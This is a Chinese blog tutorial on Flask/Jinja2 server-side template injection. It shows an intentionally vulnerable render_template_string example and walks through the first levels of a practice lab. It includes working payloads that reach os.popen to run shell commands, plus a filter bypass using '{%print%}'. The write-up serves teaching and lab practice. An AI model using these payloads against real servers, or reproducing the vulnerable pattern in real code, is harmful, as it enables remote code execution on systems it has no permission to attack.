<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>浅探 Flask+jinja2 SSTI | Gard3nia's Blog</title><meta name="description" content="0x01SSTI漏洞原理研究何为模板注入模板其实可以理解为MVC框架中的view，模板可以让网站实现界面与数据的分离，业务代码和逻辑代码的分离，使得代码重用更加容易。模板引擎的实现方式很多，最简单的就是置换型的模板，将指定模板内容中的特定标记替换一下就生成了最终需要的业务数据。 通俗来讲就是一段代码中存在可动态替换的部分，且用户对内容可控，有点像下面这种形式，这个print出来的内容就能因为use"><meta name="keywords" content="SSTI"><meta name="author" content="Gard3nia"><meta name="copyright" content="Gard3nia"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://gard3nia.top/2022/03/05/%E6%B5%85%E6%8E%A2-Flask-jinja2-SSTI/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="preconnect" href="//zz.bdstatic.com"/><meta name="google-site-verification" content="BFoiCjZGmn_71sWuDYx-7UEM26kH7ZsjecUFZ3_wabE"/><meta name="baidu-site-verification" content="code-QZLPYYwqlz"/><meta property="og:type" content="article"><meta property="og:title" content="浅探 Flask+jinja2 SSTI"><meta property="og:url" content="https://gard3nia.top/2022/03/05/%E6%B5%85%E6%8E%A2-Flask-jinja2-SSTI/"><meta property="og:site_name" content="Gard3nia's Blog"><meta property="og:description" content="0x01SSTI漏洞原理研究何为模板注入模板其实可以理解为MVC框架中的view，模板可以让网站实现界面与数据的分离，业务代码和逻辑代码的分离，使得代码重用更加容易。模板引擎的实现方式很多，最简单的就是置换型的模板，将指定模板内容中的特定标记替换一下就生成了最终需要的业务数据。 通俗来讲就是一段代码中存在可动态替换的部分，且用户对内容可控，有点像下面这种形式，这个print出来的内容就能因为use"><meta property="og:image" content="https://s4.ax1x.com/2021/12/08/oWeAoj.png"><meta property="article:published_time" content="2022-03-05T14:22:01.000Z"><meta property="article:modified_time" content="2022-03-07T15:34:55.708Z"><meta name="twitter:card" content="summary"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime: '天',
  date_suffix: {"one_hour":"刚刚","hours":"小时前","day":"天前"},
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: true,
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
    },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2022-03-07 23:34:55'
}</script><noscript><style type="text/css">
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = 'false'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><meta name="generator" content="Hexo 5.2.0"></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://z3.ax1x.com/2021/11/13/Isj3rT.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">18</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">19</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">8</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01SSTI%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E7%A0%94%E7%A9%B6"><span class="toc-number">1.</span> <span class="toc-text">0x01SSTI漏洞原理研究</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%95%E4%B8%BA%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.</span> <span class="toc-text">何为模板注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flask%E5%9F%BA%E7%A1%80"><span class="toc-number">1.2.</span> <span class="toc-text">Flask基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jinja2%E6%B8%B2%E6%9F%93"><span class="toc-number">1.3.</span> <span class="toc-text">jinja2渲染</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSTI%E5%88%A9%E7%94%A8"><span class="toc-number">1.4.</span> <span class="toc-text">SSTI利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02SSTI-LAB%E9%A2%98%E8%A7%A3"><span class="toc-number">2.</span> <span class="toc-text">0x02SSTI-LAB题解</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E9%83%A8%E7%BD%B2"><span class="toc-number">2.1.</span> <span class="toc-text">环境部署</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">2.2.</span> <span class="toc-text">过滤器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level1"><span class="toc-number">2.3.</span> <span class="toc-text">level1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level2"><span class="toc-number">2.4.</span> <span class="toc-text">level2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level3"><span class="toc-number">2.5.</span> <span class="toc-text">level3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level4"><span class="toc-number">2.6.</span> <span class="toc-text">level4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level5"><span class="toc-number">2.7.</span> <span class="toc-text">level5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level6"><span class="toc-number">2.8.</span> <span class="toc-text">level6</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level7"><span class="toc-number">2.9.</span> <span class="toc-text">level7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level8"><span class="toc-number">2.10.</span> <span class="toc-text">level8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level9"><span class="toc-number">2.11.</span> <span class="toc-text">level9</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level10"><span class="toc-number">2.12.</span> <span class="toc-text">level10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level11"><span class="toc-number">2.13.</span> <span class="toc-text">level11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level12-amp-13"><span class="toc-number">2.14.</span> <span class="toc-text">level12&amp;13</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">0x03总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x04%E5%8F%82%E8%80%83"><span class="toc-number">4.</span> <span class="toc-text">0x04参考</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://s4.ax1x.com/2021/12/08/oWeAoj.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Gard3nia's Blog</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">浅探 Flask+jinja2 SSTI</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-03-05T14:22:01.000Z" title="发表于 2022-03-05 22:22:01">2022-03-05</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-03-07T15:34:55.708Z" title="更新于 2022-03-07 23:34:55">2022-03-07</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86/">漏洞原理</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="0x01SSTI漏洞原理研究"><a href="#0x01SSTI漏洞原理研究" class="headerlink" title="0x01SSTI漏洞原理研究"></a>0x01SSTI漏洞原理研究</h1><h2 id="何为模板注入"><a href="#何为模板注入" class="headerlink" title="何为模板注入"></a>何为模板注入</h2><p>模板其实可以理解为MVC框架中的view，模板可以让网站实现界面与数据的分离，业务代码和逻辑代码的分离，使得代码重用更加容易。模板引擎的实现方式很多，最简单的就是置换型的模板，将指定模板内容中的特定标记替换一下就生成了最终需要的业务数据。</p>
<p>通俗来讲就是一段代码中存在可动态替换的部分，且用户对内容可控，有点像下面这种形式，这个print出来的内容就能因为username的不同可以打印出不同的内容。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;&gt;&gt; </span>username=<span class="string">&#x27;xxx&#x27;</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">print</span>(<span class="string">f&quot;hello<span class="subst">&#123;username&#125;</span>&quot;</span>)</span><br><span class="line">helloxxx</span><br><span class="line">&gt;&gt;&gt;</span><br><span class="line">&gt;&gt;&gt;</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>username=<span class="string">&#x27;sss&#x27;</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="built_in">print</span>(<span class="string">f&quot;hello<span class="subst">&#123;username&#125;</span>&quot;</span>)</span><br><span class="line">hellosss</span><br></pre></td></tr></table></figure>

<p>而模板引擎的作用是为了使用户界面(例如上面的<code>hello+用户名</code>)与业务数据或内容(例如上面的username)生成特定的文档(如你所看到的HTML)，拿到数据后就放到模板里渲染出来返回给浏览器。</p>
<p>但是由于渲染的数据是业务数据，多数为用户提供，这就意味着用户对输入可控。如果后端没有对用户的输入进行检测和判断，那么就容产生注入漏洞。也就是我们所说的Server-Side Template Injection，也就是服务端模板注入漏洞。</p>
<h2 id="Flask基础"><a href="#Flask基础" class="headerlink" title="Flask基础"></a>Flask基础</h2><p>从最简单易懂的Flask+jinja2组合开始学起，所以下面就放些原理性的东西，以便深入理解SSTI形成的一些具体原因</p>
<p>先拿flask写个hello world</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hello_world</span>():</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;Hello World!&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>运行下，绑定在本地5000端口</p>
<p><img src="https://s1.ax1x.com/2022/03/06/brwZWt.png" alt="brwZWt.png"></p>
<p>效果如下</p>
<p><img src="https://s1.ax1x.com/2022/03/06/br0a9I.png" alt="br0a9I.png"></p>
<p>还有一些基础知识就不在这多说了，可以自己结合官方文档去学，写一些小项目玩玩~着重介绍下SSTI是怎么在flask的jinja2模板中形成的</p>
<h2 id="jinja2渲染"><a href="#jinja2渲染" class="headerlink" title="jinja2渲染"></a>jinja2渲染</h2><p>Flask使用了jinja2来对模板渲染，可以先写个简单的demo看看，这里的<code>&#123;&#123;name&#125;&#125;</code>就是需要渲染的内容。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>Welcome to ssti<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"> <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">      <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Hello, &#123;&#123;name&#125;&#125;!<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>将上述html保存在py文件同级目录下的templates目录下，稍微修改下app.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hello_world</span>():</span></span><br><span class="line">	query = request.args.get(<span class="string">&#x27;name&#x27;</span>)</span><br><span class="line">	<span class="keyword">return</span> render_template(<span class="string">&#x27;1.html&#x27;</span>, name=query)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">	app.run(debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>运行，get一个参数上去</p>
<p><img src="https://s1.ax1x.com/2022/03/07/bryaOx.png" alt="bryaOx.png"></p>
<p>可以看到页面随着get参数的不同也发生了变化</p>
<p><img src="https://s1.ax1x.com/2022/03/07/brycpd.png" alt="brycpd.png"></p>
<p>这里写的代码是没有问题的，但是如果我们这样写呢</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">hello_world</span>():</span></span><br><span class="line">	template=<span class="string">&#x27;&#x27;&#x27;&lt;html&gt;</span></span><br><span class="line"><span class="string">  &lt;head&gt;</span></span><br><span class="line"><span class="string">    &lt;title&gt;Welcome to ssti&lt;/title&gt;</span></span><br><span class="line"><span class="string">  &lt;/head&gt;</span></span><br><span class="line"><span class="string"> &lt;body&gt;</span></span><br><span class="line"><span class="string">      &lt;h1&gt;Hello, %s!&lt;/h1&gt;</span></span><br><span class="line"><span class="string">  &lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;&#x27;&#x27;&#x27;</span>%(request.args.get(<span class="string">&#x27;name&#x27;</span>))</span><br><span class="line">	<span class="keyword">return</span> render_template_string(template)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">	app.run(debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>测试下，这里就存在SSTI漏洞了</p>
<p><img src="https://s1.ax1x.com/2022/03/07/brcWo8.png" alt="brcWo8.png"></p>
<p>为什么第一段代码就没有漏洞，而第二段代码就存在漏洞呢？</p>
<p>第一段代码使用的是<code>render_template(&#39;1.html&#39;, name=query)</code>，这种形式的渲染方式的最大好处就是<code>name=query</code>是写死的，规范地使用了1.html这个模板文件，服务端先将1.html模板渲染好了，然后读入用户输入的参数，这时候模板已经固定了，用户的输入不会去改变模板的结构。</p>
<p>第二段代码使用的是<code>render_template_string(template)</code>直接将用户输入的name拼接到模板中，再进行渲染，用户输入的东西这里还是支持用模板的方式去渲染的，也就是支持模板引擎支持的语法的，所以就会出现SSTI。</p>
<h2 id="SSTI利用"><a href="#SSTI利用" class="headerlink" title="SSTI利用"></a>SSTI利用</h2><p>jinja2存在一些基础的语法如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.&#123;%%&#125;主要用来声明变量或用在条件语句或循环语句,注意条件和循环需要多一层&#123;%endif%&#125;或 &#123;%endfor%&#125;用作结尾</span><br><span class="line">&#123;% set c &#x3D; &#39;x&#39; %&#125;</span><br><span class="line">&#123;% if 1&#x3D;&#x3D;1 %&#125;&#123;%endif%&#125;</span><br><span class="line">&#123;% for i in [1, 2, 3] %&#125;&#123;%endfor%&#125;</span><br><span class="line"></span><br><span class="line">2.&#123;&#123;&#125;&#125;将大括号内的表达式执行并输出结果到模板内</span><br><span class="line">&#123;&#123;98-2&#125;&#125; # 96</span><br><span class="line"></span><br><span class="line">3.&#123;##&#125;注释</span><br></pre></td></tr></table></figure>

<p>但是我们如果在大括号里面输入类似<code>import os;os.system(&#39;&#39;)</code> 的内容也是无用的，因为Jinjia 引擎限制了使用import，这时我们就需要用到python的沙箱逃逸来进行漏洞的深入利用了，相关文章参考上一篇<a href="https://gard3nia.top/2022/02/23/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/%EF%BC%8C%E4%B8%8B%E9%9D%A2%E5%B0%86%E7%9B%B4%E6%8E%A5%E4%B8%8A%E4%B8%80%E4%BA%9B%E4%BE%8B%E5%AD%90%E5%92%8C%E9%A2%98%E7%9B%AE%E6%9D%A5%E5%AF%B9%E6%BC%8F%E6%B4%9E%E8%BF%9B%E8%A1%8C%E7%AE%80%E5%8D%95%E7%9A%84%E4%BA%86%E8%A7%A3%E4%B8%8E%E5%88%A9%E7%94%A8%E3%80%82">https://gard3nia.top/2022/02/23/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/，下面将直接上一些例子和题目来对漏洞进行简单的了解与利用。</a></p>
<h1 id="0x02SSTI-LAB题解"><a href="#0x02SSTI-LAB题解" class="headerlink" title="0x02SSTI-LAB题解"></a>0x02SSTI-LAB题解</h1><h2 id="环境部署"><a href="#环境部署" class="headerlink" title="环境部署"></a>环境部署</h2><p>git拉一个到本地来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;X3NNY&#x2F;sstilabs</span><br></pre></td></tr></table></figure>

<p>装上依赖库flask就可以了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd flasklab</span><br><span class="line">python app.py</span><br></pre></td></tr></table></figure>

<p>如果需要将监听改成0.0.0.0，只需要改一下app.py文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.run(host&#x3D;&#39;0.0.0.0&#39;)</span><br></pre></td></tr></table></figure>

<h2 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h2><p>一些过滤器配合管道符会有奇效~</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">length() # 获取一个序列或者字典的长度并将其返回</span><br><span class="line"></span><br><span class="line">int()：# 将值转换为int类型；</span><br><span class="line"></span><br><span class="line">float()：# 将值转换为float类型；</span><br><span class="line"></span><br><span class="line">lower()：# 将字符串转换为小写；</span><br><span class="line"></span><br><span class="line">upper()：# 将字符串转换为大写；</span><br><span class="line"></span><br><span class="line">reverse()：# 反转字符串；</span><br><span class="line"></span><br><span class="line">replace(value,old,new)： # 将value中的old替换为new</span><br><span class="line"></span><br><span class="line">list()：# 将变量转换为列表类型；</span><br><span class="line"></span><br><span class="line">string()：# 将变量转换成字符串类型；</span><br><span class="line"></span><br><span class="line">join()：# 将一个序列中的参数值拼接成字符串,通常有python内置的dict()配合使用</span><br><span class="line"></span><br><span class="line">attr(): # 获取对象的属性</span><br></pre></td></tr></table></figure>

<h2 id="level1"><a href="#level1" class="headerlink" title="level1"></a>level1</h2><p>没有waf，常规的ssti，简单测试一下<code>&#123;&#123;2*2&#125;&#125;</code>，发现存在ssti，进行注入，先获取到object类</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[-1]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>查询object的子类</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[-1].__subclasses__()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>在子类中搜寻一些可利用的类，发现<code>warnings.WarningMessage</code>，用intruder遍历下看看下标序号</p>
<p><img src="https://s4.ax1x.com/2022/03/02/bG0eY9.png" alt="bG0eY9.png"></p>
<p>查询到下标为58，这个时候我们便可以利用.<strong>init</strong>.<strong>globals</strong>来找这个类下的，init初始化类，顺利找到了<strong>linecache</strong>，最后我们利用linecache找到其中引用的os，执行命令即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__[&#39;linecache&#39;].os.popen(&#39;cat flag&#39;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>效果</p>
<p><img src="https://s4.ax1x.com/2022/03/02/bGfr7R.png" alt="bGfr7R.png"></p>
<h2 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h2><p>这一关看了下源码，过滤了<code>&#123;&#123;</code>，针对性使用<code>&#123;%%&#125;</code>来进行绕过，寻找可用模块和方法的过程就不再赘述了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%print(&#39;&#39;.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__[&#39;linecache&#39;].os.popen(&#39;cat flag&#39;).read())%&#125;</span><br></pre></td></tr></table></figure>

<h2 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h2><p>这一关没过滤，但是没回显了，可以使用dnslog外带出数据，或者使用主机监听数据</p>
